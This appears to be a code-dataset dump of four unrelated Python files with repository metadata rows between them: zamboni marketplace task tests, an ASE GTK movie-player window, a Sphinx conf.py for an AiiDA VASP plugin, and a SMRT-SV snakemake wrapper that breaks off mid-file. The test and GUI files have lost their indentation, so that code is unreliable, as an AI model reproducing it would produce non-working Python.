def test_free_iarc_excluded(self, _mock):
# Set a few exclusions that shouldn't survive.
self.app.addonexcludedregion.create(region=mkt.regions.PER.id)
self.app.addonexcludedregion.create(region=mkt.regions.FRA.id)
# Set IARC settings to influence region exclusions.
self.app.geodata.update(region_de_iarc_exclude=True,
region_br_iarc_exclude=True)
fix_excluded_regions([self.app.pk])
self.assertSetEqual(self.app.get_excluded_region_ids(),
[mkt.regions.DEU.id, mkt.regions.BRA.id])
eq_(self.app.addonexcludedregion.count(), 0)
@mock.patch('mkt.webapps.tasks.index_webapps')
def test_paid(self, _mock):
self.make_premium(self.app)
fix_excluded_regions([self.app.pk])
# There are no exclusions at all, because the payments fall back
# to rest of the world.
self.assertSetEqual(self.app.get_excluded_region_ids(), [])
eq_(self.app.addonexcludedregion.count(), 0)
@mock.patch('mkt.webapps.tasks.index_webapps')
def test_paid_and_worldwide(self, _mock):
self.make_premium(self.app)
fix_excluded_regions([self.app.pk])
self.app.addonexcludedregion.create(region=mkt.regions.RESTOFWORLD.id)
        # Every region except the US ends up excluded, because the app
        # opts out of the rest of the world.
excluded = set(mkt.regions.ALL_REGION_IDS) - set([mkt.regions.USA.id])
self.assertSetEqual(self.app.get_excluded_region_ids(), excluded)
eq_(self.app.addonexcludedregion.count(), 1)
@mock.patch('mkt.webapps.tasks.index_webapps')
def test_free_special_excluded(self, _mock):
for region in mkt.regions.SPECIAL_REGION_IDS:
self.app.addonexcludedregion.create(region=region)
fix_excluded_regions([self.app.pk])
self.assertSetEqual(self.app.get_excluded_region_ids(),
mkt.regions.SPECIAL_REGION_IDS)
eq_(self.app.addonexcludedregion.count(),
len(mkt.regions.SPECIAL_REGION_IDS))
class TestAdjustCategories(mkt.site.tests.TestCase):
fixtures = fixture('webapp_337141')
def setUp(self):
self.app = Webapp.objects.get(pk=337141)
def test_adjust_single_category(self):
self.app.categories = ['news-weather']
self.app.save()
adjust_categories([self.app.pk])
eq_(self.app.reload().categories, ['news'])
def test_adjust_double_category(self):
self.app.categories = ['news-weather', 'social']
self.app.save()
adjust_categories([self.app.pk])
self.assertSetEqual(self.app.reload().categories, ['news', 'social'])
def test_new_category(self):
app_id = 424184
# `complete=True` adds the 'utilities' category.
app = app_factory(id=app_id, name='second', status=mkt.STATUS_PUBLIC,
complete=True)
adjust_categories([app_id])
self.assertSetEqual(app.reload().categories,
['food-drink', 'health-fitness'])
|
mstriemer/zamboni
|
mkt/webapps/tests/test_tasks.py
|
Python
|
bsd-3-clause
| 32,207
|
[
"exciting"
] |
6dfa112b17444bc1fb4dd53fa82eaa6b65af8cab8a41177c042a105fca05e28e
|
#!/usr/bin/env python
import gtk
import gobject
from ase.gui.languages import translate as _
from ase.gui.widgets import pack
class Movie(gtk.Window):
def __init__(self, gui):
gtk.Window.__init__(self)
self.set_position(gtk.WIN_POS_NONE)
self.connect('destroy', self.close)
#self.connect('delete_event', self.exit2)
self.set_title('Movie')
vbox = gtk.VBox()
pack(vbox, gtk.Label(_('Image number:')))
self.frame_number = gtk.Adjustment(gui.frame, 0,
gui.images.nimages - 1,
1.0, 5.0)
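        # gtk.Adjustment args: initial value, lower bound, upper bound,
        # step increment, page increment.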
self.frame_number.connect('value-changed', self.new_frame)
hscale = pack(vbox, gtk.HScale(self.frame_number))
hscale.set_update_policy(gtk.UPDATE_DISCONTINUOUS)
hscale.set_digits(0)
buttons = [gtk.Button(stock=gtk.STOCK_GOTO_FIRST),
gtk.Button(stock=gtk.STOCK_GO_BACK),
gtk.Button(stock=gtk.STOCK_GO_FORWARD),
gtk.Button(stock=gtk.STOCK_GOTO_LAST)]
for button in buttons:
hboxb = button.child.child
label = hboxb.get_children()[1]
hboxb.remove(label)
buttons[0].connect('clicked', self.click, -10000000)
buttons[1].connect('clicked', self.click, -1)
buttons[2].connect('clicked', self.click, 1)
buttons[3].connect('clicked', self.click, 10000000)
pack(vbox, buttons)
        play, stop = pack(vbox, [gtk.Button(_('Play')),
                                 gtk.Button(_('Stop'))])
play.connect('clicked', self.play)
stop.connect('clicked', self.stop)
        self.rock = pack(vbox, gtk.CheckButton(_('Rock')))
self.time = gtk.Adjustment(2.0, 0.5, 9.0, 0.2)
hscale = pack(vbox, gtk.HScale(self.time))
hscale.set_update_policy(gtk.UPDATE_DISCONTINUOUS)
self.time.connect('value-changed', self.new_time)
self.add(vbox)
self.set_tip = gtk.Tooltips().set_tip
self.set_tip(hscale, _('Adjust play time.'))
vbox.show()
self.show()
self.gui = gui
#gui.m=self
self.direction = 1
self.id = None
def close(self, event):
self.stop()
def click(self, button, step):
i = max(0, min(self.gui.images.nimages - 1, self.gui.frame + step))
self.gui.set_frame(i)
self.frame_number.value = i
self.direction = cmp(step, 0)
def new_frame(self, widget):
self.gui.set_frame(int(self.frame_number.value))
def play(self, widget=None):
if self.id is not None:
gobject.source_remove(self.id)
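        # self.time.value is the total play time in seconds; spread it
        # over the frames to get a per-step timeout in milliseconds.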
t = int(1000 * self.time.value / (self.gui.images.nimages - 1))
self.id = gobject.timeout_add(t, self.step)
def stop(self, widget=None):
if self.id is not None:
gobject.source_remove(self.id)
self.id = None
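    # Timer callback: advance one frame per tick. In rock mode playback
    # bounces off the first and last images; otherwise it wraps around
    # modulo the number of images. Returning True keeps the timer alive.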
def step(self):
i = self.gui.frame
nimages = self.gui.images.nimages
if self.rock.get_active():
if i == 0:
self.direction = 1
elif i == nimages - 1:
self.direction = -1
i += self.direction
else:
i = (i + self.direction + nimages) % nimages
self.gui.set_frame(i)
self.frame_number.value = i
return True
def new_time(self, widget):
if self.id is not None:
self.play()
|
freephys/python_ase
|
ase/gui/movie.py
|
Python
|
gpl-3.0
| 3,528
|
[
"ASE"
] |
ee3bb5e260a89ffbc348fd2345ec1dd3754db25889affd77fa4ad24c56b62f1f
|
# -*- coding: utf-8 -*-
#
# AiiDA VASP Plugin documentation build configuration file, created by
# sphinx-quickstart on Wed Feb 17 11:53:17 2016.
#
# This file is execfile()d with the current directory set to its
# containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
import sys
import os
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
#sys.path.insert(0, os.path.abspath('.'))
# -- General configuration ------------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
#needs_sphinx = '1.0'
# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom
# ones.
extensions = [
'sphinx.ext.autodoc',
'sphinx.ext.ifconfig',
'sphinx.ext.viewcode'
]
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# The suffix(es) of source filenames.
# You can specify multiple suffixes as a list of strings:
# source_suffix = ['.rst', '.md']
source_suffix = '.rst'
# The encoding of source files.
#source_encoding = 'utf-8-sig'
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = u'AiiDA VASP Plugin'
copyright = u'2016, Mario Žic'
author = u'Mario Žic'
# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
# The short X.Y version.
version = u'0.1'
# The full version, including alpha/beta/rc tags.
release = u'0.1'
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#
# This is also used if you do content translation via gettext catalogs.
# Usually you set "language" from the command line for these cases.
language = None
# There are two options for replacing |today|: either, you set today to some
# non-false value, then it is used:
#today = ''
# Else, today_fmt is used as the format for a strftime call.
#today_fmt = '%B %d, %Y'
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
exclude_patterns = []
# The reST default role (used for this markup: `text`) to use for all
# documents.
#default_role = None
# If true, '()' will be appended to :func: etc. cross-reference text.
#add_function_parentheses = True
# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
#add_module_names = True
# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are ignored by default.
#show_authors = False
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'default'
# A list of ignored prefixes for module index sorting.
#modindex_common_prefix = []
# If true, keep warnings as "system message" paragraphs in the built documents.
#keep_warnings = False
# If true, `todo` and `todoList` produce output, else they produce nothing.
todo_include_todos = False
# -- Options for HTML output ----------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
html_theme = 'bizstyle'
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
#html_theme_options = {}
# Add any paths that contain custom themes here, relative to this directory.
#html_theme_path = []
# The name for this set of Sphinx documents. If None, it defaults to
# "<project> v<release> documentation".
#html_title = None
# A shorter title for the navigation bar. Default is the same as html_title.
#html_short_title = None
# The name of an image file (relative to this directory) to place at the top
# of the sidebar.
#html_logo = None
# The name of an image file (within the static path) to use as favicon of the
# docs. This file should be a Windows icon file (.ico) being 16x16 or 32x32
# pixels large.
#html_favicon = None
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']
# Add any extra paths that contain custom files (such as robots.txt or
# .htaccess) here, relative to this directory. These files are copied
# directly to the root of the documentation.
#html_extra_path = []
# If not '', a 'Last updated on:' timestamp is inserted at every page bottom,
# using the given strftime format.
#html_last_updated_fmt = '%b %d, %Y'
# If true, SmartyPants will be used to convert quotes and dashes to
# typographically correct entities.
#html_use_smartypants = True
# Custom sidebar templates, maps document names to template names.
#html_sidebars = {}
# Additional templates that should be rendered to pages, maps page names to
# template names.
#html_additional_pages = {}
# If false, no module index is generated.
#html_domain_indices = True
# If false, no index is generated.
#html_use_index = True
# If true, the index is split into individual pages for each letter.
#html_split_index = False
# If true, links to the reST sources are added to the pages.
#html_show_sourcelink = True
# If true, "Created using Sphinx" is shown in the HTML footer. Default is True.
#html_show_sphinx = True
# If true, "(C) Copyright ..." is shown in the HTML footer. Default is True.
#html_show_copyright = True
# If true, an OpenSearch description file will be output, and all pages will
# contain a <link> tag referring to it. The value of this option must be the
# base URL from which the finished HTML is served.
#html_use_opensearch = ''
# This is the file name suffix for HTML files (e.g. ".xhtml").
#html_file_suffix = None
# Language to be used for generating the HTML full-text search index.
# Sphinx supports the following languages:
# 'da', 'de', 'en', 'es', 'fi', 'fr', 'hu', 'it', 'ja'
# 'nl', 'no', 'pt', 'ro', 'ru', 'sv', 'tr'
#html_search_language = 'en'
# A dictionary with options for the search language support, empty by default.
# Now only 'ja' uses this config value
#html_search_options = {'type': 'default'}
# The name of a javascript file (relative to the configuration directory) that
# implements a search results scorer. If empty, the default will be used.
#html_search_scorer = 'scorer.js'
# Output file base name for HTML help builder.
htmlhelp_basename = 'AiiDAVASPPlugindoc'
# -- Options for LaTeX output ---------------------------------------------
latex_elements = {
# The paper size ('letterpaper' or 'a4paper').
#'papersize': 'letterpaper',
# The font size ('10pt', '11pt' or '12pt').
#'pointsize': '10pt',
# Additional stuff for the LaTeX preamble.
#'preamble': '',
# Latex figure (float) alignment
#'figure_align': 'htbp',
}
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title,
# author, documentclass [howto, manual, or own class]).
latex_documents = [
(master_doc, 'AiiDAVASPPlugin.tex', u'AiiDA VASP Plugin Documentation',
u'Mario Žic', 'manual'),
]
# The name of an image file (relative to this directory) to place at the top of
# the title page.
#latex_logo = None
# For "manual" documents, if this is true, then toplevel headings are parts,
# not chapters.
#latex_use_parts = False
# If true, show page references after internal links.
#latex_show_pagerefs = False
# If true, show URL addresses after external links.
#latex_show_urls = False
# Documents to append as an appendix to all manuals.
#latex_appendices = []
# If false, no module index is generated.
#latex_domain_indices = True
# -- Options for manual page output ---------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
(master_doc, 'aiidavaspplugin', u'AiiDA VASP Plugin Documentation',
[author], 1)
]
# If true, show URL addresses after external links.
#man_show_urls = False
# -- Options for Texinfo output -------------------------------------------
# Grouping the document tree into Texinfo files. List of tuples
# (source start file, target name, title, author,
# dir menu entry, description, category)
texinfo_documents = [
(master_doc, 'AiiDAVASPPlugin', u'AiiDA VASP Plugin Documentation',
author, 'AiiDAVASPPlugin', 'One line description of project.',
'Miscellaneous'),
]
# Documents to append as an appendix to all manuals.
#texinfo_appendices = []
# If false, no module index is generated.
#texinfo_domain_indices = True
# How to display URL addresses: 'footnote', 'no', or 'inline'.
#texinfo_show_urls = 'footnote'
# If true, do not generate a @detailmenu in the "Top" node's menu.
#texinfo_no_detailmenu = False
|
abelcarreras/aiida_extensions
|
plugins/jobs/vasp/docs/source/conf.py
|
Python
|
mit
| 9,316
|
[
"VASP"
] |
6682d401ac0ba5eb7bf7a884d8b648660e110550c6493835f5d7accf9a95cd52
|
#!/usr/bin/env python
import argparse
import logging
import subprocess
import sys
import os
import re
# Set logging
logging.basicConfig(filename="smrtsv.log", level=logging.DEBUG)
# Set cluster parameters
CLUSTER_SETTINGS = ' -V -cwd -e ./log -o ./log {cluster.params} -w n -S /bin/bash'
CLUSTER_FLAG = ("--drmaa", CLUSTER_SETTINGS, "-w", "60")
# Setup environment for executing commands
PROCESS_ENV = os.environ.copy()
# Prepend to PROCESS_ENV["PATH"]
INSTALL_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
INSTALL_PATH = [ # List of paths relative to INSTALL_DIR to be added to the environment $PATH
"bin",
"dist/miniconda/envs/python2/bin",
"dist/miniconda/envs/python3/bin",
"dist/miniconda/bin",
"dist/celera/wgs-8.3rc2/Linux-amd64/bin/",
"dist/amos-3.1.0/bin",
"canu/Linux-amd64/bin"
]
PROCESS_ENV_PATH = ":".join([os.path.join(INSTALL_DIR, THIS_PATH) for THIS_PATH in INSTALL_PATH])
if "PATH" in PROCESS_ENV:
PROCESS_ENV["PATH"] = PROCESS_ENV_PATH + ":" + PROCESS_ENV["PATH"]
else:
PROCESS_ENV["PATH"] = PROCESS_ENV_PATH
# Prepend to PROCESS_ENV["LD_LIBRARY_PATH"]
INSTALL_LD_PATH = [
"dist/hdf5/lib"
]
PROCESS_ENV_LD_PATH = ":".join([os.path.join(INSTALL_DIR, THIS_PATH) for THIS_PATH in INSTALL_LD_PATH])
if "LD_LIBRARY_PATH" in PROCESS_ENV:
PROCESS_ENV["LD_LIBRARY_PATH"] = PROCESS_ENV_LD_PATH + ":" + PROCESS_ENV["LD_LIBRARY_PATH"]
else:
PROCESS_ENV["LD_LIBRARY_PATH"] = PROCESS_ENV_LD_PATH
os.environ["LD_LIBRARY_PATH"] = PROCESS_ENV["LD_LIBRARY_PATH"]
# Function definitions
def _get_dist_dir():
dirname, filename = os.path.split(os.path.abspath(__file__))
return dirname
def _run_cmd(args):
"""
Run a command with the proper environment set.
:param args: A tuple of arguments starting with the command name.
:return: Return code or -1 if the process did not complete.
"""
sys.stdout.flush()
p = subprocess.Popen(args, env=PROCESS_ENV)
p.wait()
ret_code = p.returncode
return ret_code if ret_code is not None else -1
def _run_snake_target(args, *cmd):
"""
Run a snakemake target.
:param args: Arguments processed from the command line.
:param cmd: The command to run as a tuple starting with the name of the snakemake target.
:return: Return code from snakemake.
"""
# Use the user-defined cluster config path if one is given. Otherwise, use
# an empty config that comes with the SMRT-SV distribution.
if args.cluster_config is not None:
cluster_config_path = args.cluster_config
else:
cluster_config_path = os.path.join(os.path.dirname(_get_dist_dir()), "cluster.template.json")
# Setup snakemake command
prefix = [
"snakemake",
"-T",
"--rerun-incomplete",
"--cluster-config", cluster_config_path,
"--snakefile", os.path.join(os.path.dirname(_get_dist_dir()), "Snakefile"),
"-j", str(args.jobs)
]
if args.dryrun:
prefix.append("-n")
if args.distribute:
prefix.extend(CLUSTER_FLAG)
# Append command
prefix.extend(cmd)
# Append path and ld_path
prefix.extend([
"ld_path=%s" % PROCESS_ENV["LD_LIBRARY_PATH"],
"path=%s" % PROCESS_ENV["PATH"]
])
# Report (verbose)
if args.verbose:
print("Running snakemake command: %s" % " ".join(prefix))
# Run snakemake command
return _run_cmd(prefix)
def index(args):
return _run_snake_target(
args,
"prepare_reference",
"--config",
"reference=%s" % args.reference
)
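# For illustration (paths abbreviated), `smrtsv.py --jobs 4 index ref.fa`
# expands to roughly:
#   snakemake -T --rerun-incomplete --cluster-config .../cluster.template.json \
#             --snakefile .../Snakefile -j 4 prepare_reference \
#             --config reference=ref.fa ld_path=... path=...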
def align(args):
return _run_snake_target(
args,
"align_reads",
"--config",
"reference=%s" % args.reference,
"reads=%s" % args.reads,
"alignments=%s" % args.alignments,
"alignments_dir=%s" % args.alignments_dir,
"batches=%s" % args.batches,
"threads=%s" % args.threads,
"tmp_dir=%s" % args.tmpdir,
"alignment_parameters=\"%s\"" % args.alignment_parameters
)
def detect(args):
"""
Detect SVs from signatures in read alignments.
"""
# Find candidate regions in alignments.
sys.stdout.write("Searching for candidate regions\n")
command = (
"get_regions",
"--config",
"reference=%s" % args.reference,
"alignments=%s" % args.alignments,
"assembly_window_size=%s" % args.assembly_window_size,
"assembly_window_slide=%s" % args.assembly_window_slide,
"min_length=%s" % args.min_length,
"min_support=%s" % args.min_support,
"max_support=%s" % args.max_support,
"min_coverage=%s" % args.min_coverage,
"max_coverage=%s" % args.max_coverage,
"min_hardstop_support=%s" % args.min_hardstop_support,
"max_candidate_length=%s" % args.max_candidate_length
)
if args.exclude:
command = command + ("regions_to_exclude=%s" % args.exclude,)
if args.candidates:
command = command + ("candidates=%s" % args.candidates,)
return _run_snake_target(args, *command)
def assemble(args):
"""
Assemble candidate regions from raw reads aligned to regions.
"""
# Generate local assemblies across the genome.
sys.stdout.write("Starting local assemblies\n")
base_command = (
"collect_assembly_alignments",
"--config",
"reference=%s" % args.reference,
"alignments=%s" % args.alignments,
"reads=%s" % args.reads,
"tmp_dir=%s" % args.tmpdir,
"alignment_parameters=\"%s\"" % args.alignment_parameters,
"mapping_quality=\"%s\"" % args.mapping_quality,
"minutes_to_delay_jobs=\"%s\"" % args.minutes_to_delay_jobs,
"assembly_log=\"%s\"" % args.assembly_log
)
if args.candidates:
# For each contig/chromosome in the candidates file, submit a separate
# Snakemake command. To do so, first split regions to assemble into one
# file per contig in a temporary directory.
tmpdir = os.path.join(os.getcwd(), "regions_by_contig")
rebuild_regions_by_contig = False
if not args.dryrun and (not os.path.exists(tmpdir) or args.rebuild_regions):
rebuild_regions_by_contig = True
if rebuild_regions_by_contig:
try:
os.mkdir(tmpdir)
except OSError:
pass
previous_contig = None
with open(args.candidates, "r") as fh:
contigs = set()
for line in fh:
contig = line.strip().split()[0]
if previous_contig != contig:
if previous_contig is not None and rebuild_regions_by_contig:
contig_file.close()
previous_contig = contig
contigs.add(contig)
if rebuild_regions_by_contig:
contig_file = open(os.path.join(tmpdir, "%s.bed" % contig), "w")
if rebuild_regions_by_contig:
contig_file.write(line)
if rebuild_regions_by_contig:
contig_file.close()
# Assemble regions per contig creating a single merged BAM for each contig.
local_assembly_basename = os.path.basename(args.assembly_alignments)
local_assemblies = set()
return_code = 0
for contig in contigs:
contig_local_assemblies = os.path.join("local_assemblies", local_assembly_basename.replace(".bam", ".%s.bam" % contig))
local_assemblies.add(contig_local_assemblies)
if os.path.exists(contig_local_assemblies):
sys.stdout.write("Local assemblies already exist for %s\n" % contig)
continue
command = base_command + ("regions_to_assemble=%s" % os.path.join(tmpdir, "%s.bed" % contig),)
command = command + ("assembly_alignments=%s" % contig_local_assemblies,)
sys.stdout.write("Starting local assemblies for %s\n" % contig)
logging.debug("Assembly command: %s", " ".join(command))
return_code = _run_snake_target(args, *command)
if return_code != 0:
break
# If the last command executed successfully, try to merge all local
# assemblies per contig into a single file.
if not args.dryrun and return_code == 0:
if len(local_assemblies) > 1:
return_code = _run_cmd(["samtools", "merge", args.assembly_alignments] + list(local_assemblies))
else:
return_code = _run_cmd(["samtools", "view", "-b", "-o", args.assembly_alignments] + list(local_assemblies))
if return_code == 0:
return_code = _run_cmd(["samtools", "index", args.assembly_alignments])
# Return the last return code.
return return_code
else:
if args.assembly_alignments:
command = base_command + ("assembly_alignments=%s" % args.assembly_alignments,)
logging.debug("Assembly command: %s", " ".join(command))
            return _run_snake_target(args, *command)
def call(args):
# Call SVs, indels, and inversions.
sys.stdout.write("Calling variants\n")
return_code = _run_snake_target(
args,
"call_variants",
"--config",
"reference=%s" % args.reference,
"alignments=%s" % args.alignments,
"local_assembly_alignments=%s" % args.assembly_alignments,
"variants=%s" % args.variants,
"species=\"%s\"" % args.species,
"sample=\"%s\"" % args.sample
)
if return_code != 0:
sys.stderr.write("Failed to call variants\n")
return return_code
def run(args):
# Get default jobs
if "jobs" in args:
default_jobs = args.jobs
else:
default_jobs = 1
# Get the number of jobs for each step
job_step = re.split("\\s*[,;:]\\s*", args.runjobs.strip()) # Split into array
job_step = [job_step[i] if len(job_step) > i else '' for i in range(4)] # Extend to length 4
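    # e.g. --runjobs "8,4,,2" with --jobs 1 yields [8, 4, 1, 2]:
    # align=8, detect=4, assemble=1 (the default), call=2.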
# Convert each number of jobs to integers
for i in range(4):
if job_step[i] != '':
try:
job_step[i] = int(job_step[i])
except ValueError:
sys.stderr.write("Invalid number of jobs for step %d: Must be an integer: \"%s\"\n" % ((i + 1), job_step[i]))
return 1
else:
job_step[i] = default_jobs
# Report the number of jobs for each task
if args.verbose and args.distribute:
print("Jobs per task:")
print("\t* Align: %s" % job_step[0])
print("\t* Detect: %s" % job_step[1])
print("\t* Assemble: %s" % job_step[2])
print("\t* Call: %s" % job_step[3])
# Build reference indices
return_code = index(args)
if return_code != 0:
sys.stderr.write("Failed to index reference\n")
return return_code
# Align
args.jobs = job_step[0]
return_code = align(args)
if return_code != 0:
sys.stderr.write("Failed to align reads\n")
return return_code
# Detect SVs.
args.jobs = job_step[1]
return_code = detect(args)
if return_code != 0:
sys.stderr.write("Failed to identify candidate regions\n")
return return_code
# Run local assemblies.
args.jobs = job_step[2]
return_code = assemble(args)
if return_code != 0:
sys.stderr.write("Failed to generate local assemblies\n")
return return_code
# Call SVs, indels, and inversions.
args.jobs = job_step[3]
return_code = call(args)
if return_code != 0:
sys.stderr.write("Failed to call variants\n")
return return_code
return 0
def genotype(args):
# Genotype SVs.
sys.stdout.write("Genotyping SVs\n")
return_code = _run_snake_target(
args,
"convert_genotypes_to_vcf",
"--config",
"genotyper_config=%s" % args.genotyper_config,
"genotyped_variants=%s" % args.genotyped_variants,
"threads=%s" % args.threads
)
if return_code != 0:
sys.stderr.write("Failed to genotype SVs\n")
return return_code
# Main
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument("--dryrun", "-n", action="store_true", help="Print commands that will run without running them")
parser.add_argument("--distribute", action="store_true", help="Distribute analysis to Grid Engine-style cluster")
parser.add_argument("--jobs", help="number of jobs to run simultaneously", type=int, default=1)
parser.add_argument("--tmpdir", help="temporary directory to use for distributed jobs", default="/var/tmp")
parser.add_argument("--verbose", "-v", help="print extra runtime information", action="store_true")
parser.add_argument("--cluster_config", help="JSON/YAML file specifying cluster configuration parameters to pass to Snakemake's --cluster-config option")
parser.add_argument("--drmaalib", help="For jobs that are distributed, this is the location to the DRMAA library (libdrmaa.so) installed with Grid Engine. Use this to set DRMAA_LIBRARY_PATH in the environment for pipelined commands. If DRMAA_LIBRARY_PATH is already set in the environment when calling this program, this option is not required.")
subparsers = parser.add_subparsers()
# Index a reference for use by BLASR.
parser_index = subparsers.add_parser("index", help="index a reference sequence for use by BLASR")
parser_index.add_argument("reference", help="FASTA file of reference to index")
parser_index.set_defaults(func=index)
# Align PacBio reads to an indexed reference with BLASR.
parser_align = subparsers.add_parser("align", help="align PacBio reads to an indexed reference with BLASR")
parser_align.add_argument("reference", help="FASTA file of indexed reference with .ctab and .sa in the same directory")
parser_align.add_argument("reads", help="text file with one absolute path to a PacBio reads file (.bax.h5) per line")
parser_align.add_argument("--alignments", help="text file with one absolute path to a BLASR alignments file (.bam) per line", default="alignments.fofn")
parser_align.add_argument("--alignments_dir", help="absolute path of directory for BLASR alignment files", default="alignments")
parser_align.add_argument("--batches", help="number of batches to split input reads into such that there will be one BAM output file per batch", type=int, default=1)
parser_align.add_argument("--threads", help="number of threads to use for each BLASR alignment job", type=int, default=1)
parser_align.add_argument("--alignment_parameters", help="BLASR parameters to use to align raw reads", default="-bestn 2 -maxAnchorsPerPosition 100 -advanceExactMatches 10 -affineAlign -affineOpen 100 -affineExtend 0 -insertion 5 -deletion 5 -extend -maxExtendDropoff 50")
parser_align.set_defaults(func=align)
# Detect SV signatures in BLASR alignments and build sliding windows to assemble.
parser_detector = subparsers.add_parser("detect", help="detect SV signatures in BLASR-aligned reads")
parser_detector.add_argument("reference", help="FASTA file of indexed reference with .ctab and .sa in the same directory")
parser_detector.add_argument("alignments", help="text file with one absolute path to a BLASR raw reads alignments file (.bam) per line")
parser_detector.add_argument("candidates", help="BED file of candidates detected in read alignments")
parser_detector.add_argument("--exclude", help="BED file of regions to exclude from local assembly (e.g., heterochromatic sequences, etc.)")
parser_detector.add_argument("--assembly_window_size", type=int, help="size of reference window for local assemblies", default=60000)
parser_detector.add_argument("--assembly_window_slide", type=int, help="size of reference window slide for local assemblies", default=20000)
parser_detector.add_argument("--min_length", type=int, help="minimum length required for SV candidates", default=50)
parser_detector.add_argument("--min_support", type=int, help="minimum number of supporting reads required to flag a region as an SV candidate", default=5)
parser_detector.add_argument("--max_support", type=int, help="maximum number of supporting reads allowed to flag a region as an SV candidate", default=100)
parser_detector.add_argument("--min_coverage", type=int, help="minimum number of total reads required to flag a region as an SV candidate", default=5)
parser_detector.add_argument("--max_coverage", type=int, help="maximum number of total reads allowed to flag a region as an SV candidate", default=100),
parser_detector.add_argument("--min_hardstop_support", type=int, help="minimum number of reads with hardstops required to flag a region as an SV candidate", default=11)
parser_detector.add_argument("--max_candidate_length", type=int, help="maximum length allowed for an SV candidate region", default=60000)
parser_detector.set_defaults(func=detect)
# Assemble candidate regions and align assemblies back to the reference.
parser_assembler = subparsers.add_parser("assemble", help="assemble candidate regions and align assemblies back to the reference")
parser_assembler.add_argument("reference", help="FASTA file of indexed reference with .ctab and .sa in the same directory")
parser_assembler.add_argument("reads", help="text file with one absolute path to a PacBio reads file (.bax.h5) per line")
parser_assembler.add_argument("alignments", help="text file with one absolute path to a BLASR raw reads alignments file (.bam) per line")
parser_assembler.add_argument("candidates", help="BED file of regions to assemble from raw read alignments")
parser_assembler.add_argument("assembly_alignments", help="BAM file with BLASR alignments of local assemblies against the reference")
parser_assembler.add_argument("--rebuild_regions", action="store_true", help="rebuild subset of regions to assemble")
parser_assembler.add_argument("--alignment_parameters", help="BLASR parameters to use to align local assemblies", default="-affineAlign -affineOpen 8 -affineExtend 0 -bestn 1 -maxMatch 30 -sdpTupleSize 13")
parser_assembler.add_argument("--mapping_quality", type=int, help="minimum mapping quality of raw reads to use for local assembly", default=30)
parser_assembler.add_argument("--minutes_to_delay_jobs", type=int, help="maximum number of minutes to delay local assembly jobs to limit simultaneous I/O on shared storage", default=1)
parser_assembler.add_argument("--assembly_log", help="name of log file for local assemblies", default="assembly.log")
parser_assembler.set_defaults(func=assemble)
# Call SVs and indels from BLASR alignments of local assemblies.
parser_caller = subparsers.add_parser("call", help="call SVs and indels by BLASR alignments of local or whole genome assemblies")
parser_caller.add_argument("reference", help="FASTA file of indexed reference with .ctab and .sa in the same directory")
parser_caller.add_argument("alignments", help="text file with one absolute path to a BLASR raw reads alignments file (.bam) per line")
parser_caller.add_argument("assembly_alignments", help="BAM file with BLASR alignments of local assemblies against the reference")
parser_caller.add_argument("variants", help="VCF of variants called by local assembly alignments")
parser_caller.add_argument("--sample", help="Sample name to use in final variant calls", default="UnnamedSample")
parser_caller.add_argument("--species", help="Common or scientific species name to pass to RepeatMasker", default="human")
parser_caller.set_defaults(func=call)
# Run: Call SVs and indels from BLASR alignments of raw reads.
parser_runner = subparsers.add_parser("run", help="call SVs and indels by local assembly of BLASR-aligned reads")
parser_runner.add_argument("reference", help="FASTA file of indexed reference with .ctab and .sa in the same directory")
parser_runner.add_argument("reads", help="text file with one absolute path to a PacBio reads file (.bax.h5) per line")
parser_runner.add_argument("--variants", help="VCF of variants called by local assembly alignments", default="variants.vcf")
parser_runner.add_argument("--alignments", help="text file with one absolute path to a BLASR raw reads alignments file (.bam) per line", default="alignments.fofn")
parser_runner.add_argument("--alignments_dir", help="absolute path of directory for BLASR alignment files", default="alignments")
parser_runner.add_argument("--candidates", help="BED file of candidates detected in read alignments", default="candidates.bed")
parser_runner.add_argument("--assembly_alignments", help="BAM file with BLASR alignments of local assemblies against the reference", default="local_assembly_alignments.bam")
parser_runner.add_argument("--batches", help="number of batches to split input reads into such that there will be one BAM output file per batch", type=int, default=1)
parser_runner.add_argument("--threads", help="number of threads to use for each BLASR alignment job", type=int, default=1)
parser_runner.add_argument("--exclude", help="BED file of regions to exclude from local assembly (e.g., heterochromatic sequences, etc.)")
parser_runner.add_argument("--assembly_window_size", type=int, help="size of reference window for local assemblies", default=60000)
parser_runner.add_argument("--assembly_window_slide", type=int, help="size of reference window slide for local assemblies", default=30000)
parser_runner.add_argument("--min_length", type=int, help="minimum length required for SV candidates", default=50)
parser_runner.add_argument("--min_support", type=int, help="minimum number of supporting reads required to flag a region as an SV candidate", default=5)
parser_runner.add_argument("--max_support", type=int, help="maximum number of supporting reads allowed to flag a region as an SV candidate", default=100)
parser_runner.add_argument("--min_coverage", type=int, help="minimum number of total reads required to flag a region as an SV candidate", default=5)
parser_runner.add_argument("--max_coverage", type=int, help="maximum number of total reads allowed to flag a region as an SV candidate", default=100),
parser_runner.add_argument("--rebuild_regions", action="store_true", help="rebuild subset of regions to assemble")
parser_runner.add_argument("--refindex", action="store_true", help="Generate a BLASR index on the reference sequence.")
